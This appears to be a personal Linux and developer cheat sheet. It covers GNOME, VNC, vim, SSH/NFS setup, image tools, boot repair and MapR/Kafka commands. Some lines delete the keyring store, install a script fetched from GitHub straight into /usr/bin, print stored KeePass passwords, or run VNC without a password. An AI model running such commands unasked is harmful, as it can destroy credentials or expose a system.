path_to_extension=~/Downloads/switcherlandau.fi.v28.shell-extension.zip

plugin_uuid=`unzip -c $path_to_extension metadata.json | grep uuid | cut -d \" -f4`
plugin_dir="$HOME/.local/share/gnome-shell/extensions/$plugin_uuid"
mkdir -p $plugin_dir
unzip -q $path_to_extension -d $plugin_dir/
sudo systemctl restart gdm

delete gnome extension

path_to_extension=~/Downloads/gsconnectandyholmes.github.io.v53.shell-extension.zip

plugin_uuid=`unzip -c $path_to_extension metadata.json | grep uuid | cut -d \" -f4`
if [[ -n $plugin_uuid ]]; then
    plugin_dir="$HOME/.local/share/gnome-shell/extensions/$plugin_uuid"
    rm -rf $plugin_dir
    sudo systemctl restart gdm
else
    echo "plugin folder was not found"
fi

gnome keyring

raise InitError("Failed to unlock the collection!")
# kill all "keyring-daemon" sessions
# clean up all previous runs
rm ~/.local/share/keyrings/*
ls -la ~/.local/share/keyrings/

dbus-run-session -- bash
gnome-keyring-daemon --unlock
# type your password, <enter> <Ctrl-D>
keyring set cc.user cherkavi
keyring get cc.user cherkavi

keyring reset password

PATH_TO_KEYRING_STORAGE=~/.local/share/keyrings/login.keyring 
mv $PATH_TO_KEYRING_STORAGE "${PATH_TO_KEYRING_STORAGE}-original"
# go to applications->passwords and keys-> "menu:back" -> "menu:passwords"

gnome launch via ssh

ssh -Y remoteuser@remotehost dbus-launch -f gedit
ssh -X remoteuser@remotehost dbus-launch gnome-terminal

certification

Generating a RSA private key

openssl req -new \
-newkey rsa:2048 \
-nodes -out cherkavideveloper.csr \
-keyout cherkavideveloper.key \
-subj "/C=DE/ST=Bavaria/L=München/O=cherkavi/CN=cherkavi developer" \
# scp -i $AWS_KEY_PAIR cherkavideveloper.csr [email protected]:~/
# scp -i $AWS_KEY_PAIR cherkavideveloper.key [email protected]:~/
openssl req -x509 \
-days 365 \
-newkey rsa:2048 \
-nodes -out cherkavideveloper.pem \
-keyout cherkavideveloper.pem \
-subj "/C=DE/ST=Bavaria/L=München/O=cherkavi/CN=cherkavi developer"

console browsers

online http test

local http server http test server

nc -kdl localhost 8000
# Sample request maker on another shell:
wget http://localhost:8000
npm -g install http-server
http-server

Utilities

terminal window in browser

automation for browsers,

automate repited actions: iMacros

md2html, markdown to html, markdown tool

sudo apt-get update
sudo apt-get install -y python3-sphinx
pip3 install recommonmark sphinx-markdown-tables --user
sphinx-build "/path/to/source" "/path/to/build" .
pandoc README.md | lynx -stdin
markdown-it README.md
glow README.md

keepass

sudo add-apt-repository ppa:jtaylor/keepass
sudo apt-get update && sudo apt-get install keepass2

keepassxc-cli

## set key file instead of password
KEEPASS_KEY=/home/projects/keepass.keyx
# create key file: openssl rand -out $KEEPASS_KEY 256
ll $KEEPASS_KEY
# set key file 
keepassxc-cli db-edit --set-key-file  $KEEPASS_KEY  $KEEPASS_FILE 
# check key file with entering password
keepassxc-cli ls --key-file $KEEPASS_KEY $KEEPASS_FILE 
# unset password 
keepassxc-cli db-edit --key-file $KEEPASS_KEY  $KEEPASS_FILE  --unset-password
keepassxc-cli ls --key-file $KEEPASS_KEY $KEEPASS_FILE --no-password

# unset key file 
# keepassxc-cli db-edit --unset-key-file  $KEEPASS_KEY  $KEEPASS_FILE 


# get password
keepassxc-cli show -s -k $KEEPASS_KEY $KEEPASS_FILE  'Client1/Order Value'  --no-password

vnc

vnc installation

sudo apt install tightvncserver
sudo apt install x11vnc

~/.vnc/xstartup, file for starting vncserver

for starting Docker container with UI, vnc with docker

chmod +x ~/.vnc/xstartup
#!/bin/sh

# sudo apt install xfce4

# Fix to make GNOME and GTK stuff work
export XKL_XMODMAP_DISABLE=1
unset SESSION_MANAGER
unset DBUS_SESSION_BUS_ADDRESS
startxfce4 &

[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
xsetroot -solid grey
vncconfig -iconic &

vnc start local server

# check your active display 
DISPLAY=:1 xrandr  --current
DISPLAY=:2 xrandr  --current
DISPLAY=:3 xrandr  --current
# run
x11vnc -display :1 -rfbport 5902
# stop
x11vnc -R stop
# run 
tightvncserver :1 -geometry 1920x1080 -rfbport 5902
ps aux | grep tightvnc

# stop 
tightvncserver -kill :1
tightvncserver -kill :2

vnc server local start

# vnc server 
sudo apt install tigervnc-standalone-server
# tigervncserver

## issue on Ubuntu 22.04
# sudo apt install tightvncserver
# tightvncserver

# vncserver -passwordfile ~/.vnc/passwd -rfbport 5900 -display :0
vncserver
# for changing password
vncpasswd
# list of vnc servers 
vncserver -list
# stop vnc server
vncserver -kill :1
# configuration

vim ~/.vnc/xstartup
# xrdb $HOME/.Xresources
# startxfce4 &

vnc server with connecting to existing X session

# https://github.com/sebestyenistvan/runvncserver
sudo apt install tigervnc-scraping-server

## password for VNC server
vncpasswd

## start vnc server 
X0tigervnc -PasswordFile ~/.vnc/passwd
# the same as: `x0vncserver -display :0`
x0vncserver -passwordfile ~/.vnc/passwd -rfbport 5900 -display :0

## list of the servers
x0vncserver -list

## log files 
ls $HOME/.vnc/*.log

x0vncserver -kill :1

vnc start, x11vnc start, connect to existing display, vnc for existing display

# export DISPLAY=:0
# Xvfb $DISPLAY -screen 0 1920x1080x16 &
# Xvfb $DISPLAY -screen 0 1920x1080x24 # not more that 24 bit for color

# startxfce4 --display=$DISPLAY &

# sleep 1
x11vnc -quiet -localhost -viewonly -nopw -bg -noxdamage -display $DISPLAY &

# just show current desktop 
x11vnc

vnc commands

# start server
vncserver -geometry 1920x1080
# full command, $DISPLAY can be ommited in favoud to use "next free screen"
vncserver $DISPLAY -rfbport 5903 -desktop X -auth /home/qqtavt1/.Xauthority -geometry 1920x1080 -depth 24 -rfbwait 120000 -rfbauth /home/qqtavt1/.vnc/passwd  -fp /usr/share/fonts/X11/misc,/usr/share/fonts/X11/Type1 -co /etc/X11/rgb

## Couldn't start Xtightvnc; trying default font path.
## Please set correct fontPath in the vncserver script.
## Couldn't start Xtightvnc process.

# start server with new monitor
vncserver -geometry 1920x1080 -fp "/usr/share/fonts/X11/misc,/usr/share/fonts/X11/Type1,built-ins"

# check started
ps aux | grep vnc
# kill server
vncserver -kill :1

vnc client, vnc viewer, vnc player

# !!! don't use Remmina !!!
sudo apt install xvnc4viewer

timer, terminal timer, console timer

sudo apt install sox libsox-fmt-mp3
https://github.com/rlue/timer
sudo curl -o /usr/bin/timer https://raw.githubusercontent.com/rlue/timer/master/bin/timer
sudo chmod +x /usr/bin/timer
# set timer for 5 min 
timer 5

vim

vim cheat sheet

vim pipe

echo "hello vim " | vim - -c "set number"

copy-paste

  • v - visual selection ( start selection )
  • y - yank ( end selection )
  • p - paste into position
  • u - undo last changes
  • ctrl-r - redo last changes

read output of command

:read !ls -la

vim execute selection

1) select text with v-visual mode
2) semicolon
3) w !sh
:'<,'>w !sh

vim plugin managers

file ~/.vimrc should have next content:

if empty(glob('~/.vim/autoload/plug.vim'))
  silent !curl -fLo ~/.vim/autoload/plug.vim --create-dirs
    \ https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
  autocmd VimEnter * PlugInstall --sync | source $MYVIMRC
endif

call plug#begin('~/.vim/plugged')
Plug 'junegunn/seoul256.vim'
Plug 'junegunn/goyo.vim'
Plug 'junegunn/limelight.vim'
Plug 'vim-airline/vim-airline'
Plug 'vim-airline/vim-airline-themes'
" Plug 'andreshazard/vim-logreview'
" Plug 'dstein64/vim-win'

call plug#end()

set laststatus=2
set ignorecase
set smartcase
set number
set nocompatible
filetype on
set incsearch
set hlsearch

or

git clone --depth=1 https://github.com/vim-airline/vim-airline ~/.vim/plugged/vim-airline
git clone --depth=1 https://github.com/dstein64/vim-win ~/.vim/plugged/vim-win
vim anyfile.txt
:PlugInstall

.vim folder example

.vim
├── autoload
│   └── plug.vim
├── colors
│   └── wombat.vim
├── pack
│   └── plugins
└── plugged
    ├── goyo.vim
    ├── lightline.vim
    ├── limelight.vim
    ├── seoul256.vim
    ├── vim-airline
    └── vim-airline-themes

vifm

colorschema

copy to ~/.config/vifm/colors color scheme
:colorscheme <tab>

visual code extensions

create custom

npx --package yo --package generator-code -- yo code

select option "open in code"
run in "debug" mode - will open another 'code' with your extension

## common
codium --install-extension nick-rudenko.back-n-forth
codium --install-extension alefragnani.numbered-bookmarks
codium --install-extension rockingskier.copy-copy-paste
codium --install-extension mksafi.find-jump
codium --install-extension jacobdufault.fuzzy-search
codium --install-extension qcz.text-power-tools
codium --install-extension redhat.vscode-commons
codium --install-extension visualstudioexptteam.vscodeintellicode
codium --install-extension foam.foam-vscode
codium --install-extension devwright.vscode-terminal-capture
# markdown
codium --install-extension tchayen.markdown-links
codium --install-extension kortina.vscode-markdown-notes
codium --install-extension yzhang.markdown-all-in-one
codium --install-extension gera2ld.markmap-vscode
# json
codium --install-extension mohsen1.prettify-json
codium --install-extension vthiery.prettify-selected-json
codium --install-extension richie5um2.vscode-statusbar-json-path

## common-ext
codium --install-extension GitHub.copilot # don't install for pytest
codium --install-extension atlassian.atlascode
codium --install-extension ms-vscode-remote.remote-containers
codium --install-extension ms-vscode-remote.remote-ssh
codium --install-extension ms-vscode-remote.remote-ssh-edit
codium --install-extension liximomo.remotefs

## git
codium --install-extension donjayamanne.githistory
codium --install-extension qezhu.gitlink
codium --install-extension TeamHub.teamhub

## containers
codium --install-extension peterjausovec.vscode-docker
codium --install-extension ms-azuretools.vscode-docker

## shell 
codium --install-extension inu1255.easy-shell
codium --install-extension ryu1kn.edit-with-shell
codium --install-extension ms-toolsai.jupyter-renderers
codium --install-extension devwright.vscode-terminal-capture
codium --install-extension miguel-savignano.terminal-runner
codium --install-extension tyriar.terminal-tabs

## jupyter
codium --install-extension ms-toolsai.jupyter
codium --install-extension ms-toolsai.jupyter-keymap

## java
codium --install-extension vscjava.vscode-java-dependency
codium --install-extension vscjava.vscode-java-pack
codium --install-extension vscjava.vscode-java-test
codium --install-extension redhat.java
codium --install-extension vscjava.vscode-maven
codium --install-extension vscjava.vscode-java-debug

## python
codium --install-extension ms-python.python
codium --install-extension ms-python.vscode-pylance
codium --install-extension ms-pyright.pyright

## scala 
codium --install-extension scala-lang.scala

## sql
codium --install-extension mtxr.sqltools
codium --install-extension mtxr.sqltools-driver-mysql

taskwarrior

task add what I need to do
task add wait:2min  finish call
task waiting
task 25 modify wait:2min
task 25 edit
task 25 delete
task 25 done
task project:'BMW'
task priority:high 
task next

doc:

extension:

sudo cpan JSON

commands:

  task 13 annotate -- ~/checklist.txt
  task 13 annotate https://translate.google.com
  task 13 denotate
  taskopen 1

  # add notes
  task 1 annotate Notes
  taskopen 1

Terminator

plugins

bluejeans installation ubuntu 18+

# retrieve all html anchors from url, html tags from url
curl -X GET https://www.bluejeans.com/downloads | grep -o '<a .*href=.*>' | sed -e 's/<a /\n<a /g' | sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d' | grep rp

sudo alien --to-deb bluejeans-1.37.22.x86_64.rpm 
sudo dpkg -i bluejeans_1.37.22-2_amd64.deb 

sudo apt install libgconf-2-4 
sudo ln -s /lib/x86_64-linux-gnu/libudev.so.1 /lib/x86_64-linux-gnu/libudev.so.0

sudo ln -s /opt/bluejeans/bluejeans-bin /usr/bin/bluejeans

smb client, samba client

smbclient -U $SAMBA_CLIENT_GROUP//$SAMBA_CLIENT_USER \
//europe.ubs.corp/win_drive/xchange/Zurich/some/folder

tiling window manager i3wm, i3 desktop

Alternatives:

config file

vim ~/.config/i3/config

exit from i3 window manager

i3-msg exit
#bindsym $mod+Shift+e exec i3-msg exit

keyboard layout add to config file

exec "setxkbmap -layout us,de"
exec "setxkbmap -option 'grp:alt_shift_toggle'"

icaclient citrix

sudo apt remove icaclient

sudo dpkg --add-architecture i386

install dependencies

#sudo apt-get install ia32-libs ia32-libs-i386 libglib2.0-0:i386 libgtk2.0-0:i386
sudo apt-get install libglib2.0-0:i386 libgtk2.0-0:i386
sudo apt-get install gcc-multilib
sudo apt-get install libwebkit-1.0-2:i386 libwebkitgtk-1.0-0:i386
sudo dpkg --install icaclient_13.10.0.20_amd64.deb

mc color, midnight commander

file:~/.mc/ini

[Colors]
base_color=normal=brightgray,black:marked=brightcyan,black:selected=black,lightgray:directory=white,black:errors=red,black:executable=brightgreen,black:link=brightblue,black:stalelink=red,black:device=brightmagenta,black:special=brightcyan,black:core=lightgray,black:menu=white,black:menuhot=brightgreen,black:menusel=black,white:editnormal=brightgray,black:editmarked=black,brightgreen:editbold=brightred,cyan
mc --nocolor

install ssh server, start ssh server, server ssh

# sudo apt install openssh-server
sudo apt install ssh

sudo service ssh start

# sudo systemsctl status ssh
sudo service ssh status

# firewall ubuntu
sudo ufw allow ssh

# configuration
sudo vim /etc/ssh/sshd_config

for enabling/disabling password using

PasswordAuthentication yes

ssh server without password ssh with rsa

  1. copy public key
# ssh-keygen -b 4096
cat $USER/.ssh/id_rsa.pub secret_user_rsa.pub
  1. to ssh server
# touch ~/.ssh/authorized_keys; chmod 600 ~/.ssh/authorized_keys
cat secret_user_rsa.pub >> $USER/.ssh/authorized_keys
  1. change config
# sudo vim /etc/ssh/sshd_config
PubkeyAuthentication yes
PasswordAuthentication no
AuthorizedKeysFile .ssh/authorized_keys
  1. restart service
  2. connect with existing user on remote server ( you can also can specify -i ~/.ssh/id_rsa )

nfs server

nfs install

sudo apt install nfs-kernel-server
systemctl status nfs-server
nfsstat

nfs create mount point

# create point 
sudo mkdir /mnt/disks/k8s-local-storage1
# mount 
sudo mount /dev/sdc /mnt/disks/k8s-local-storage1
sudo chmod 755 /mnt/disks/k8s-local-storage1
# createlink 
sudo ln -s /mnt/disks/k8s-local-storage1/nfs nfs1

# update storage
sudo cat /etc/exports
# /mnt/disks/k8s-local-storage1/nfs       10.55.0.0/16(rw,sync,no_subtree_check)

# restart 
sudo exportfs -a
sudo exportfs -v

nfs parameters

ll /sys/module/nfs/parameters/
ll /sys/module/nfsd/parameters/

remote client for nfs mapping

sudo vim /etc/fstab
# 10.55.0.3:/mnt/disks/k8s-local-storage/nfs /mnt/nfs nfs rw,noauto,x-systemd.automount,x-systemd.device-timeout=10,timeo=14 0 0
# 10.55.0.3:/mnt/disks/k8s-local-storage1/nfs /mnt/nfs1 nfs defaults 0 0

# refresh mapping
sudo mount -av

youtube

youtube-dl --list-formats https://www.youtube.com/watch?v=nhq8e9eE_L8
youtube-dl --format 22 https://www.youtube.com/watch?v=nhq8e9eE_L8

youtube subtitles

YT_URL=...
youtube-dl --list-subs $YT_URL
YT_LANG=de
# original subtitles
youtube-dl --write-sub --sub-lang $YT_LANG $YT_URL
# autogenerated subtitles
youtube-dl --write-auto-sub --sub-lang $YT_LANG --skip-download $YT_URL

or direct from browser find: https://www.youtube.com/api/timedtext...

youtube view counter

VIDEO_URL="https://www.youtube.com/watch?v=Rppjx10EeQo"
curl $VIDEO_URL | hq . | grep interactionCount | awk '{print $2}' | awk -F '=' '{print $2}'

screen video recording, screen recording

# start recording
# add-apt-repository ppa:savoury1/ffmpeg4 && apt update && apt install -y ffmpeg
ffmpeg -y -video_size 1280x1024 -framerate 20 -f x11grab -i :0.0 /output/out.mp4

# stop recording
ps aux | grep ffmpeg | head -n 1 | awk '{print $2}' | xargs kill --signal INT 

video metadata

sudo apt install mediainfo
mediainfo video.mp4
mediainfo -f video.mp4

image format, image size, image information, image metadata

# sudo apt-get install imagemagick
identify -verbose image.png

# https://imagemagick.org/script/escape.php
identify -format "%m" image.png     # format type 
identify -format "%wx%h" image.png  # width x height

image resize, image size, image rotation, image scale

# sudo apt-get install imagemagick
# without distortion
convert marketing.png -resize 100x100 marketing-100-100.png
# mandatory size, image will be distorted
convert marketing.png -resize 100x100 marketing-100-100.png
# rotate and change quality
convert marketing.png -rotate 90 -charcoal 4 -quality 50 marketing.png
# merge pdf files
convert 1.pdf 2.pdf 3.pdf result.pdf
# Error: no image defined
# /etc/ImageMagick-6/policy.xml
# <policy domain="coder" rights="read|write| pattern="PDF" />

image cut image crop

WIDTH=200
HEIGHT=200
X=10
Y=20
convert input.jpg -crop $WIDTHx$HEIGHT+$X+$Y output.jpg

image change color image black and white image monochrome imagemagic

convert $IMAGE_ORIGINAL -monochrome $IMAGE_CONVERTED
convert $IMAGE_ORIGINAL -remap pattern:gray50 $IMAGE_CONVERTED
convert $IMAGE_ORIGINAL -colorspace Gray $IMAGE_CONVERTED
convert $IMAGE_ORIGINAL -channel RGB -negate $IMAGE_CONVERTED

image text recognition ocr, text from image, text recognition

gocr $IMAGE_POST_CONVERTED
# for color image play with parameter 0%-100% beforehand
convert $IMAGE_ORIGINAL -threshold 75% $IMAGE_CONVERTED

get image info image metadata

exiftool my_image.jpg
exif my_image.jpg
identify -verbose my_image.jpg

image remove gps remove metadata cleanup

exiftool -gps:all= *.jpg

image remove all metadata

exiftool -all= *.jpg

image tags

# tags list: https://exiftool.org/TagNames
# sub-elements: https://exiftool.org/TagNames/GPS.html
exiftool -GPS:GPSLongitude *.jpg

exiftool -filename  -gpslatitude -gpslongitude  *.jpg
exiftool -filename  -exif:gpslongitude  *.jpg

top

top hot keys:

  • t - change graphical representation
  • e - change scale
  • z - color
  • c - full command
  • d - delay
  • o - filter ( COMMAND=java )

ngrok

# ngrok install
sudo snap install ngrok
# ngrok setup 
x-www-browser https://dashboard.ngrok.com/get-started/setup
ngrok config add-authtoken aabbccddeeffgg

ngrok config check

x-www-browser https://dashboard.ngrok.com/tunnels/agents

# how to start as a service
# https://github.com/cherkavi/cheat-sheet/blob/master/linux.md#ngrok

stress test memory test

apt update; apt install -y stress

start process with occupying certainly 100 Mb

stress --vm 1 --vm-bytes 100M

boot loader efi

sudo apt install efibootmgr
efibootmgr -v

# boot order, boot descriptions
efibootmgr

## set bootorder
# read
efibootmgr | grep BootOrder
# write 
sudo efibootmgr --bootorder 0002,0000,0004,0007,0003,0006

if you have lost ability to start bootloader from current drive or you can't see anymore normal boot loader

sudo apt install grub-efi
sudo grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=GRUB
sudo grub-mkconfig -o /boot/grub/grub.cfg
lsblk
# sda           8:0    0   477G  0 disk 
# ├─sda1        8:1    0   512M  0 part 
# └─sda2        8:2    0 476,4G  0 part /media/qxxxxxx/26d89655-ea1a-4922-9724-9a7a25


DISK_ID=26d89655-ea1a-4922-9724-9a7a25
ls /media/${USER}/${DISK_ID}/boot/efi
sudo mount /dev/sda1 /media/${USER}/${DISK_ID}/boot/efi

sudo grub-install /dev/sda --target=x86_64-efi --efi-directory=/media/${USER}/${DISK_ID}/boot/efi

ls -la /media/${USER}/${DISK_ID}/boot/efi/EFI
# ls -la /media/${USER}/${DISK_ID}/boot/efi/EFI/BOOT
# ls -la /media/${USER}/${DISK_ID}/boot/efi/EFI/ubuntu

mkdir /tmp/bootloader-efi
cp -r /media/${USER}/${DISK_ID}/boot/efi/EFI /tmp/bootloader-efi
ls /tmp/bootloader-efi
DISK_ID=26d89655-ea1a-4922-9724-9a7a25
ls /media/${USER}/${DISK_ID}/boot/efi
# re-attach drive 
sudo cp -r /tmp/bootloader-efi/* /media/${USER}/${DISK_ID}/boot/efi
sudo ls -la /media/${USER}/${DISK_ID}/boot/efi/
# sudo rm -rf /media/${USER}/${DISK_ID}/boot/efi/bootloader-efi

| mailto: |to set the recipient, or recipients, separate with comma | | &cc= |to set the CC recipient(s) | | &bcc= |to set the BCC recipient(s) | | &subject=|to set the email subject, URL encode for longer sentences, so replace spaces with %20, etc. | | &body= |to set the body of the message, you can add entire sentences here, including line breaks. Line breaks should be converted to %0A.|

mail console client

aerc

## create application password: https://myaccount.google.com/u/1/apppasswords
## vim ~/.config/aerc/accounts.conf

## vim ~/.config/aerc/aerc.conf
# [filters]
# text/html = "w3m -T text/html"
sudo apt install aerc 

mutt

# aerc; alpine, neomutt
# sudo apt-get install alpine
sudo apt-get install mutt  # For Debian/Ubuntu
mkdir -p ~/.mutt/cache/
mkdir -p "~/.mutt/cache/headers"
mkdir -p "~/.mutt/cache/bodies"

mutt setup pop3

echo "
set pop_host = $POP3_HOST
set pop_user = $POP3_USER
set pop_pass = $POP3_PASS
set pop_port = $POP3_PORT
set from = $POP3_EMAIL
set realname = $POP3_USER_TITLE
" > ~/.muttrc

mutt setup imap

echo "
set imap_user = $IMAP_USER
set imap_pass = $IMAP_PASS
# set imap_port = $IMAP_PORT
set folder = $IMAP_FOLDER # "imaps://imap.example.com/"
set spoolfile = "+INBOX"
set postponed = "+[Gmail]/Drafts"
set header_cache = "~/.mutt/cache/headers"
set message_cachedir = "~/.mutt/cache/bodies"

# Other settings
set from = $IMAP_EMAIL
set realname = $IMAP_TITLE
" > ~/.muttrc
# cat ~/.muttrc
mutt

Machine Learning

:TODO: python framework mataflow from metaflow import FlowSpec, step :TODO: python framework sklearn from sklearn.pipeline import Pipeline

graph LR;
    A[<b>Data In</b>
    * filtered
    * cleaned
    * labeled
    ] --> 
    B(<b>ML Algorithm</b>
    * frameworks
    * algorithms
    🔄️
    );

    B --> 
    C(<b>Data out</b>
    ✅️ example 🆗️
    )    
Loading

graph 

m[<b>model</b>]
t[training]
i[inference]
t --associate--> m
i --associate--> m

r[regression
  model]
c[classification
  model]
c --extend--> m
r --extend--> m

l[label]
l --assign 
    to -->m

id[input data]
f[feature]
f --o id

idl[ <b>input data</b>
     labeled
     for training]
idnl[<b>input data</b>
    not labeled
    for prediction]
idl --extend--> id

idnl --extend--> id 
l --o idl

id ~~~ i
Loading

Necessary knowledges

graph LR;
    d[design] --> md[model <br>development] --> o[operations]
    md --> d 
    o --> md
Loading

design

  • Requirement engineering
  • ML UseCases prioritization
  • Data Availability Check

model development

  • Data Engineering
  • ML Model Engineering
  • Model Testing & Validation

operations

  • ML Model Deployment
  • CI/CD pipelines
  • Monitoring & triggering

Frameworks

MapR cheat sheet

Links

Architecture examples

connected drive

MapR general info

# gateway config
maprcli cluster gateway list
# config of the services
maprcli cluster queryservice getconfig

MapR Streams

parallelism

  • Partition Id
  • Hash of messageId
  • Round-Robin

stream analyzer

mapr streamanalyzer -path /mapr/dp.prod.zur/vantage/orchestr/streams/my-own-test -topics cherkavi-test -printMessages true -countMessages

sending messages via client library

sending by client consuming by broker

spreading message between partitions, assigning message to paritiion

  • by partition number
  • by message key
  • round-robin ( without previous two )
  • properties.put("streams.patitioner.class", "my.package.MyClassName.class")
public class MyClassName implements Partitioner{
   public int partition( String topic, Object, key, byte[] keyBytes, Object value, byte[] valueBytes, Cluster cluster){}
}

replication

replication back loop

reading messages via client library

lib request client rading

reading messages cursor types

  • Read cursor ( client request it and broker sent )
  • Committed cursor ( client confirmed/commited reading ) cursor types

Replicating streams

  • Master->Slave
  • Many->One
  • MultiMaster: Master<-->Master
  • Stream replications: Node-->Node2-->Node3-->Node4 ... ( with loop preventing )

command line

find CLDB hosts ( ContainerLocationDataBase )

maprcli node listcldbs
## volume create
VOLUME_NAME=test_volume
VOLUME_PATH=/store/processed/test_creation
mkdir $VOLUME_PATH
maprcli volume create -name $VOLUME_NAME -path $VOLUME_PATH
## possible issue:
# Successfully created volume: 'test_volume'
# ERROR (10003) -  Volume mount for /store/processed/test_creation failed, No such file or directory

or via REST API of MapR Control System

mapr volume remove

## volume remove
maprcli volume remove -name $VOLUME_NAME

mapr volume get info

## list of MapR volumes in json format
# json, path , columns , local, global, system, unmounted, summary, sort, limit
maprcli volume list -json > ~/volume-list.json

hadoop mfs -ls $FOLDER_PATH
# volume: vrwxrwxrwx
# directory: drwxrwxrwx
maprcli volume info -path $FOLDER_PATH

stream create

maprcli stream create -path <filepath & name>
maprcli stream create -path <filepath & name> -consumeperm u:<userId> -produceperm u:<userId> -topicperm u:<userId>
maprcli stream create -path <filepath & name> -consumeperm "u:<userId>" -produceperm "u:<userId>" -topicperm "u:<userId>" -adminperm "u:<userId1> | u:<userId2>"

stream check creation

maprcli stream info -path {filepath}

stream remove, stream delete

maprcli stream delete -path <filepath & name>

topic create

maprcli stream topic create -path <path and name of the stream> -topic <name of the topic>

topic remove, topic delete

maprcli stream topic delete -path <path and name of the stream> -topic <name of the topic>

topic check, topic print

maprcli stream topic list -path <path and name of the stream>

read data

maprcli stream cursor list -path $KAFKA_STREAM -topic $KAFKA_TOPIC -consumergroup $KAFKA_CONSUMER_GROUP -json

API, java programming

compile java app

javac -classpath `mapr classpath` MyConsumer.java

producer

java -classpath kafka-clients-1.1.1-mapr-1808.jar:slf4j-api-1.7.12.jar:slf4j-log4j12-1.7.12.jar:log4j-1.2.17.jar:mapr-streams-6.1.0-mapr.jar:maprfs-6.1.0-mapr.jar:protobuf-java-2.5.0.jar:hadoop-common-2.7.0.jar:commons-logging-1.1.3-api.jar:commons-logging-1.1.3.jar:guava-14.0.1.jar:commons-collections-3.2.2.jar:hadoop-auth-2.7.0-mapr-1808.jar:commons-configuration-1.6.jar:commons-lang-2.6.jar:jackson-core-2.9.5.jar:. MyConsumer

java example, kafka java application

Properties properties = new Properties();
properties.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
properties.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
// org.apache.kafka.common.serialization.ByteSerializer
// properties.put("client.id", <client id>)

import org.apache.kafka.clients.producer.KafkaProducer;
KafkaProducer producer = new KafkaProducer<String, String>(properties);

String streamTopic = "<streamname>:<topicname>"; // "/streams/my-stream:topic-name"
ProducerRecord<String, String> record = new ProducerRecord<String, String>(streamTopic, textOfMessage);
// ProducerRecord<String, String> record = new ProducerRecord<String, String>(streamTopic, messageTextKey, textOfMessage);
// ProducerRecord<String, String> record = new ProducerRecord<String, String>(streamTopic, partitionIntNumber, textOfMessage);

Callback callback = new Callback(){
  public void onCompletion(RecordMetadata meta, Exception ex){
    meta.offset();
  }
};
producer.send(record, callback);
producer.close();

sending conditions

flash client buffer

parallel sending

streams.parallel.flushers.per.partition default true:
  • does not wait for ACK before sending more messages
  • possible for messages to arrive out of order
streams.parallel.flushers.per.partition set to false: 
  • client library will wait for ACK from server
  • slower than default setting sending types

retrieving metadata during connection with Kafka

metadata.max.age.ms

How frequently to fetch metadata

consumer

java consumer

Properties properties = new Properties();
properties.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
properties.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
// org.apache.kafka.common.serialization.ByteSerializer
// properties.put("auto.offset.reset", <Earliest, Latest, None>)
// properties.put("group.id", <group identificator>)
// properties.put("enable.auto.commit", <true - default | false >), use consumer.commitSync() if false
// properties.put("auto.commit.interval.ms", <default value 1000ms>)

import org.apache.kafka.clients.consumer.KafkaConsumer;
KafkaConsumer consumer = new KafkaConsumer<String, String>(properties);

String streamTopic = "<streamname>:<topicname>"; // "/streams/my-stream:topic-name"
consumer.subscribe(Arrays.asList(topic));
// consumer.subscribe(topic, new RebalanceListener());
ConsumerRecords<String, String> messages = consumer.poll(1000L); // reading with timeout
messages.iterator().next().toString(); // "/streams/my-stream:topic-name, parition=1, offset=256, key=one, value=text"

java rebalance listener

public class RebalanceListener implements ConsumerRebalanceListener{
    onPartitionAssigned(Collection<TopicPartition> partitions)
    onPartitionRevoked(Collection<TopicPartition> partitions)
}

execute java app

(maven repository)[https://repository.mapr.com/nexus/content/repositories/releases/]

<repositories>
  <repository>
    <id>mapr-maven</id>
    <url>http://repository.mapr.com/maven</url>
    <releases>
      <enabled>true</enabled>
    </releases>
    <snapshots>
      <enabled>false</enabled>
    </snapshots>
  </repository>
</repositories>
<dependencies>
  <dependency>
    <groupId>org.apache.kafka</groupId>
    <artifactId>kafka-clients</artifactId>
    <version>0.9.0.0-mapr-1602-streams-5.1.0</version>
    <scope>provided</scope>
  </dependency>
</dependencies>

execute on cluster

mapr classpath
java -cp `mapr classpath`:my-own-app.jar mypackage.MainClass

curl_user="cluster_user"
curl_pass="cluster_user_password"
stream_path="%2Fvantage%2Forchestration%2Fstreams%2Fpipeline"
topic_name="gateway"
host="https://ubsdpdesp000001.vantage.org"
port=8082

# maprcli stream topic list -path $stream_path # need to replace %2 with /

curl -u $curl_user:$curl_pass \
--insecure -s -X GET \
-H "Content-Type: application/vnd.kafka.v2+json" \
$host:$port/topics/$stream_path%3A$topic_name
URL_REST_API=https://mapr-web.vantage.zur:20702
# x-www-browser $URL_REST_API/app/swagger/

REST_API=${URL_REST_API}/api/v2
REST_API_TABLE=${REST_API}/table/  # ends with slash !!!
MAPR_DB_PATH=/vantage/store/tables/signals
SESSION_ID=efba27777-313d
curl -X GET --insecure -L -u $USER_DATA_API_USER:$USER_DATA_API_PASSWORD  ${REST_API_TABLE}${MAPR_DB_PATH}'?condition=\{"$eq":\{"session":"'$SESSION_ID'"\}\}&limit=1' | jq .

maprcli

login, print info, logout

maprlogin password -user {your cluster username}
# long term ticket
maprlogin password -user {your cluster username} -duration 30:0:0 -renewal 90:0:0

maprlogin print
maprlogin authtest

maprlogin logout

login with ticket file using to login

OCP_TICKET_NAME=maprticket
FILE_WITH_TICKET=prod.maprticket
oc get secret $OCP_TICKET_NAME -o json | jq .data.CONTAINER_TICKET -r  |  base64 --decode > $FILE_WITH_TICKET
maprlogin renew -ticketfile $FILE_WITH_TICKET

login via ssh

execution_string="echo '"$CLUSTER_PASS"' | maprlogin password -user cherkavi "
ssh $CLUSTER_USER@$CLUSTER_NODE $execution_string

check your credential, expiration date/time

maprlogin print -ticketfile <your ticketfile> 
# you will see expiration date like 
# on 07.05.2019 13:56:47 created = 'Tue Apr 23 13:56:47 UTC 2019', expires = 'Tue May 07 13:56:47 UTC 2019'

generate ticket

maprlogin generateticket -type service -cluster my61.cluster.com -duration 30:0:0 -out /tmp/mapr_ticket -user mapr

check status of the cluster, cluster health check

maprcli dashboard info -json

posix client

keys

$ wget -O - https://package.mapr.com/releases/pub/maprgpg.key | sudo apt-key add -

